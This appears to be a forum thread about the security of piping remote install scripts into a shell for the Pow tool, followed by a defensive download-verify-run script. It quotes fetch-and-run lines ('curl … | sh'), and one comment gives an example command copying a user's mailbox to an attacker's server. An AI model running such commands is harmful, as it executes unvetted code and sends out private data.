
Why is this bad? I get why it seems offensive, but how is running a random shell script from some host any different than running some random software downloaded and installed from the same host? Anything malicious that the shell script could do could also be done by the software itself once installed, no? If they're from the same official source, why should one be considered more trustworthy than the other?

EDIT: Okay, I see it's because of the use of sudo. But graphical installers often require the root/administrator password, and could be equally destructive.




If you download an installer from an https:// link, even though you still aren't capital-S Secure, you're still more secure than running shell scripts spat out over TCP port 80.


So would,

    curl https://get.pow.cx/ | sh
Fix your complaint? Like the grandparent said, I'm not sure why curl | sh is any less secure than gem install or whathaveyou, in the oh-god-this-script-just-ran-rm-rf-/ sense.


It would improve the situation but I'm still not a fan of perpetuating the pipe-into-shell idiom.


The only meaningful difference between the two techniques is the extra step required to explicitly execute an installer. Is that your objection, that you don't like something being automatically executed upon download?


HTTPS, automatic installation, and UX that confounds security for end-users are my three objections to this gimmick.


I really don't see what's to object about. People who care about security can review it. People who just want it to work and don't care about security will blindly execute whatever instructions are written on the site. If the app is malicious then the latter group is screwed no matter what, doesn't matter whether it's 'curl | sh' or whether it's a .dmg/.zip/.tar.gz.


Your HTTPS suggestion makes sense, but can you explain your other two points by contrasting with "gem install"? How is the installation any more automatic? How does the UX confound security?


I was assuming HTTPS based on this thread chain, but even in practice, most installers I see aren't downloaded over HTTPS.

How does this practice confound security more than a normal installer? sudo asks for my password just as a normal installer would.


It's easier for a man in the middle to change a 15-line text script than to change a binary. Lowering that effort = increasing the odds and incidence of attempted attacks.


I request one thing, you send me something completely different. I don't see how making the "something" an ASCII script makes it easier than a random binary (and there's no requirement that the random binary has any relationship with what I requested).

Oddly, I'm more used to seeing arguments that distributing source code is better than distributing binaries because you can inspect source code.


The scenario isn't that I send you something different, but that somebody else gets in between us and tampers with the data. That's what https tries to avoid.

We're arguing levels of badness here so it's a little hokey. But if you decide to open up your machine to run arbitrary code, a machine that can run shell will arguably get more infections than one that runs executables. To infect the latter any script kiddies will need to know a 'harder' language and at least how to compile it. It's a couple more hoops to jump through. In the other case I could drive by and do scp ~/mailbox me@myserver:


"Tampers with the data" is functionally equivalent to sending me something different. There's no requirement that it looks like what I requested at all, and as long as it will execute when double-clicked, it'll do the trick.

We're already talking about running arbitrary code on a machine, compiled versus interpreted is irrelevant. And I think you have forgotten that a script with the appropriate hash-bang and file permissions is indistinguishable to most users from a compiled executable.


Rubygems at least has a post-install hook that gem authors can execute automatically.


Just let me know when I can do: port selfupdate; port info ...


I thought everyone moved over to homebrew now :)


Sure, but a huge amount of software is distributed over plain old HTTP anyway. I agree that we should be using HTTPS for things like this, but I don't buy that curling a shell script is worse than downloading an installer over an unencrypted connection.


If you want https you can install from github:

curl https://github.com/37signals/pow/raw/master/install.sh | sh


No you're not! It's the same security issue.

You can for example, at your network level point get.pow.cx to a malicious script and you're done. That's the security issue, it has nothing to do with the HTTP protocol.

With that being said, I don't care, the risk is the same as downloading any software via http, in fact I loved it, so easy :-).


In fact it's much more transparent. With a compiled binary you don't see the steps involved, with a bash script you can step line by line and see exactly what the script is doing.

Those that don't care won't look at the script any more than they'll check the md5 hash of a binary to see that it's a legit binary. For those that care, they can look at the bash source.


Sorry, I just don't agree with this, but I also recognize it as a topic that we can nerd out over for hours and hours without improving the universe even a little. If what 'tptacek thinks about the security of software distribution means anything to you --- I'm not saying it has to --- then know that I think this is a bad idea that is only not causing problems because it is a gimmick used by so few projects.


I'm really, really trying to understand your viewpoint on this. How is this any more insecure than downloading (over HTTP) and running a graphical installer that requires your root password? Is it just because it takes a bit more effort to exploit a binary, given a MitM position, or am I missing something else?


We get that you think it is a bad idea, but don't know/understand why/how?

Since you are the security expert at HN, we are trying to understand/learn from you.

This is not plain Nerdgasm; making people understand about software security is making the world a little better.


You mean DNS spoofing. That only works if you can get a valid certificate at one of the recognized CAs. If you use a self-signed one, curl will still complain unless -k is given. But then again, after the Comodo fiasco...
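Several comments above converge on the same defensive pattern: fetch over HTTPS with certificate checks left on, save to a file so you can actually read it, compare it against a digest published out of band, and only then run it. The script below is an added example written for this thread, not code from the Pow project or from anyone in the discussion; the install URL and the digest in the usage line are placeholders, and the only real values are standard curl flags and the SHA-256 of a constructed test file.

```shell
#!/bin/sh
# Added example: download-then-verify-then-run instead of `curl http://... | sh`.
# URL and digest used in the usage comment are placeholders, not real project values.

# Compute a SHA-256 hex digest portably (sha256sum on Linux, shasum on macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Return 0 only when the file's digest equals the digest obtained out of band
# (from the project's release page or signed announcement, not from the same
# unauthenticated download that produced the file).
verify_sha256() {
    [ "$(sha256_of "$1")" = "$2" ]
}

# Download to a file rather than into sh. HTTPS is enforced for the initial URL
# and for redirects, TLS 1.2 or newer is required, certificate verification is
# left on (no -k), and --fail stops an HTTP error page from being saved as the
# "script".
fetch_installer() {
    curl --fail --proto '=https' --proto-redir '=https' --tlsv1.2 -sSL "$1" -o "$2"
}

# Full sequence: fetch, verify, let the user read it, then run it. The script
# runs with the caller's privileges; if it calls sudo itself, you have at least
# seen the commands it will run before typing a password.
install_verified() {
    url=$1; expected=$2; dest=$(mktemp)
    fetch_installer "$url" "$dest" || { echo "download failed" >&2; rm -f "$dest"; return 1; }
    verify_sha256 "$dest" "$expected" || { echo "digest mismatch" >&2; rm -f "$dest"; return 1; }
    ${PAGER:-less} "$dest"          # review the script before it runs
    sh "$dest"; status=$?
    rm -f "$dest"
    return $status
}

# Usage (placeholder URL and digest):
# install_verified https://example.invalid/install.sh <sha256-from-release-page>
```

The digest check is what separates this from a plain HTTPS download: a valid certificate only proves you reached the host named in the URL, so a compromised host, a DNS trick paired with a mis-issued certificate, or a swapped file on a mirror all still pass TLS, while none of them passes a digest you copied from somewhere the attacker does not control.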